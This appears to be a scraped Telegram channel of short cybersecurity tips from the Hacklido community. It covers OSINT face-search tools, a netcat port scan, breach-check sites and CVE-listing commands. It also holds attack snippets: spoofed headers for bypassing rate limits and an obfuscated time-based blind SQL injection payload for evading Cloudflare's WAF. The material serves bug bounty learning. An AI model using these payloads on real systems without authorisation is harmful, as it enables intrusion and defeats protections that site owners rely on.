HACKLIDO | Cyber Security
8.04K subscribers
157 photos
18 files
1K links
Hacklido โ€“ Cybersecurity & Hacking Community
โšก๏ธ Daily Security Tips | OSINT | Bug Bounty | Pentesting
๐Ÿ“œ Cheatsheets โ€ข Tools โ€ข Threat Intel โ€ข Cyber News
โœ๏ธ Learn โ€ข Blog โ€ข Grow Together

๐ŸงŠ https://hacklido.com
Download Telegram
Reverse Image Search Like a Pro ๐Ÿ•ต๏ธโ€โ™‚๏ธ

Top Search Engines:

1๏ธโƒฃ Google Lens : Best for identifying products, plants, and landmarks.
2๏ธโƒฃ Yandex Images : The "King" of facial recognition. It finds people better than any other free engine.
3๏ธโƒฃ TinEye : Best for finding the original source and high-res versions.
4๏ธโƒฃ Bing Visual Search : Best for "searching within a search." You can isolate a specific object inside a photo.

Top Professional Investigator Tools:

1๏ธโƒฃ PimEyes / FaceCheck.ID : High-powered AI facial recognition to find where a face appears online.
2๏ธโƒฃ Pixsy : Used by photographers to track copyright theft and unauthorized use.
3๏ธโƒฃ Lnso.ai : Automatically categorizes results into People, Places, and Duplicates.

Tip: Crop images before searching for better accuracy.

#OSINT #ThreatIntel #HacklidoTips
๐Ÿ”ฅ5
Weโ€™re going live now! ๐Ÿš€
Click the link below to join the session instantly.๐Ÿ‘‡๐Ÿป

https://meet.google.com/fct-rsxg-ofh
Quick Port Scan Without Nmapโ—๏ธโ“

nc -zv abc.com 1-1000

Useful when Nmap is blocked.
Lightweight โ‰  useless.โœŒ๐Ÿป

#Pentesting #Networking #HacklidoTips
๐Ÿ‘4
Bypassing Rate Limit Protection๐Ÿง‘๐Ÿปโ€๐Ÿ’ป๐Ÿ‘ฉ๐Ÿปโ€๐Ÿ’ป

Add these headers in your request [through burp suite]โœŒ๐Ÿป

X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Host: 127.0.0.1
X-Forwared-Host: 127.0.0.1
X-Forwarded-For: 127.0.0.1

#BugBounty #WebSecurity #HacklidoTips
โค4
Breach Data Check websites

1. Have I Been Pwned [haveibeenpwned.com]
2. Firefox Monitor [monitor.mozilla.org]
3. Data Breach [databreach.com]
4. LeakCheck [leakcheck.io]
5. Quick Heal Data Breach Checker [https://www.quickheal.co.in/data-breach-checker]

#DataLeaks #Cybersecurity #HacklidoTips #Hacklido
AI SECURITY ROADMAP๐Ÿ’ฅ

Stage 1 : Foundational Principles and Governance
Stage 2 : Threat Modeling and Risk Assessment
Stage 3 : Secure AI Development
Stage 4 : Secure Deployment and Monitoring
Stage 5 : Incident Response and Forensics
Stage 6 : Advanced Security and Future Trends

#AISecurity #AIRoadmap #Roadmap #Hacklido #HacklidoTips
โค5
How I track the latest CVEs โ€” top 20, fast ๐Ÿ”ฅ

curl -s 'https:/ /cvedb.shodan.io/cves' \
| jq -r '.cves[:20][]?.cve_id'

==> Want id+summary?

curl -s 'https:/ /cvedb.shodan.io/cves' \
| jq '[.cves
| sort_by(.published? // .Published? // .modified? // "1970-01-01")
| reverse
| .[:20][]? | {cve_id, summary}]'


Note : Make sure you remove the space between https:/ and /cvedb before using the command must be https://

Tool: cvedb.shodan.io
Bug Bounty Tip: Cloudflare 403 Bypass for Time-Based Blind SQLi

When your payload gets blocked by Cloudflare (403), try obfuscation with URL encoding to sneak it past!

โŒ Blocked Payload
(select(0)from(select(sleep(10)))v) โ†’ 403 Forbidden

โœ… Bypass Payload
(select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'%5C"%2B(select(0)from(select(sleep(6)))v)


๐Ÿ” This obfuscation can help trigger Time-Based Blind SQLi even when WAF protection is in place.
โค3